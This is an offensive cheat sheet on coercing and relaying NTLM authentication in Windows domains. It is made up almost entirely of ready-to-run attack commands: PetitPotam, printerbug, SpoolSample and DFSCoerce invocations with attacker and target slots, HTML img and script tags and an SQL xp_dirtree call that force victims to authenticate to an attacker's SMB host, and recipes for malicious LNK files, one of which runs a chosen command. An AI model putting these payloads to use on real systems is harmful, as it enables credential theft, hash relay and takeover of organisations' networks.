• Run responder/Inveigh/NTLMrelayx etc on another host, and then coerce authentication
  • Crack NTLM hashes
  • Relay NTLM hashes to SMB
  • Relay NTLM hashes to LDAP
  • Relay NTLM to Web (ADCS etc)

https://github.com/topotam/PetitPotam

python3 PetitPotam.py -d <domain> -u <username> -p <password> <attacker> <target>

https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py

printerbug.py '<domain>'/'<user>':'<password>'@'<target>' '<attacker>'

https://github.com/leechristensen/SpoolSample

SpoolSample.exe <target> <attacker>

https://github.com/Wh04m1001/DFSCoerce

dfscoerce.py -d <domain> -u <username> -p <password> <attacker> <target>

• Script that will attempt multiple different coercion attacks

https://github.com/p0dalirius/Coercer

• Check for WebClient enabled

cme smb <target(s)> -d <domain> -u <username> -p <password> -M webdav

• Force the victim to authenticate via WebDav

``python3 PetitPotam.py -d -u -p @80/AAAA `

• It seemed to work best using FQDN for attacker

• Send an email with a link to the server
• Use an image, or SCRIPT inside an email/HTML file

<img src="\\xxx.xxx.xxx.xxx\image.png height="1" width="1">
<script>language='javascript' src="\\xxx.xxx.xxx.xxx\pwnd\pwnd.js"</script>

EXEC master.sys.xp_dirtree '\\xxx.xxx.xxx.xxx\pwnd',1,1

• Place the file on an SMB share

• Make with LNKUp https://github.com/Plazmaz/LNKUp

lnkup.py --host <host> --type ntlm --output evil.lnk
lnkup.py --host <host>--type ntlm --output evil.lnk --execute "<windows command to execute>"

• Make with PowerShell

$link = New-Object -ComObject WScript.Shell
$shortcut = $link.CreateShortcut("<\\path\shortcut.lnk>")
$shortcut.WindowStyle = 1
$shortcut.IconLocation = "<path to icon>"
$shortcut.Save()